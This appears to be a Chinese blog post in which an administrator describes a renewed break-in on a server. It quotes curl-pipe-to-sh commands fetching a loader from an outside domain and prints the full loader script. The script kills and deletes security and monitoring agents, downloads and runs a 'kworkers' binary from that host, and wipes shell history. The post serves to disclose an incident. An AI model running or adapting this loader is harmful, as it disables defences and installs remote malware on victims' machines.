服务器被入侵,执行了2个非常危险的命令_titanagent
赞
踩
机器之前中过木马,手动清除了,以为没事了,就没重装系统
今天发现又被登录,执行了2个命令
sh -c 'curl | http://m.windowsupdatesupport.org/d/loader.sh|sh'
sh -c \'curl | http://m.windowsupdatesupport.org/d/loader.sh|sh\'
可惜2个命令没有执行成功,因为机器被我屏蔽外网了
用浏览器下载了loader.sh,脚本如下:
ps aux | grep -v grep | grep 'aegis' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'hids' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'titanagent' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'hids' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'titanagent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'sgagent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'barad_agent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'hostguard' | awk '{print $2}' | xargs -I {} kill -9 {}
###此处是服务器的监控程序,入侵者想删掉我们机器的监控程序
rm -rf /usr/local/xxx
rm -rf /usr/local/xxxx
rm -rf /usr/local/xxxx
ps aux | grep -v grep | grep 'kworkers' | awk '{print $2}' | xargs -I {} kill -9 {}
domainroota=m.windowsupdatesupport.org
mkdir ~/.git
mkdir ./.git
gitdir=~/.git
if [ -d ~/.git ]; then
gitdir=~/.git
fi
if [ -d ./.git ]; then
gitdir=./.git
fi
curl http://$domainroota/d/kworkers -o $gitdir/kworkers
chmod 777 $gitdir/kworkers
if [ -e /.dockerenv ]
then
$gitdir/kworkers
else
nohup $gitdir/kworkers >>$gitdir/.log&
fi
sed -i '/$domainroota/d' ~/.bash_history
